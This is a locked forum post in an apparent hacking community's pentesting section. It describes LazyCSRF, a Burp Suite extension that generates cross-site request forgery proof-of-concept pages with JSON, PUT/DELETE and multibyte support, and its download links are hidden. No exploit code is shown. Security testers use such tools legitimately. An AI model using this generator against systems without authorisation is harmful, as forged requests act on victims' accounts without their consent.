Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked lazyCSRF v0.0.2 - useful CSRF PoC generator

itsMe

By MASTERitsMe
in Pentesting

 Share

Recommended Posts

itsMe Master Hacker

MASTERitsMe

Posted
Posted

This is the hidden content, please

LazyCSRF

LazyCSRF is a more useful CSRF PoC generator that runs on Burp Suite.

Motivation

Burp Suite is an intercepting HTTP Proxy, and it is the defacto tool for performing web application security testing. The feature of Burp Suite that I like the most is Generate CSRF PoC. However, it does not support JSON parameters. It also uses the <form>, so it cannot send PUT/DELETE requests. In addition, multibyte characters that can be displayed in Burp Suite itself are often garbled in the generated CSRF PoC. Those were the motivations for creating LazyCSRF.
Features

    Support JSON parameter (like a request to the API)
    Support PUT/DELETE (only work with CORS enabled with an unrestrictive policy)
    Support displaying multibyte characters (like Japanese)
    Generating CSRF PoC with Burp Suite Community Edition (of course, it also works in Professional Edition)

The difference in the display of multibyte characters

The following image shows the difference in the display of multibyte characters between Burp’s CSRF PoC generator and LazyCSRF. LazyCSRF can generate PoC for CSRF without garbling multibyte characters. This is only the case if the characters are not garbled on Burp Suite.

This is the hidden content, please

Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.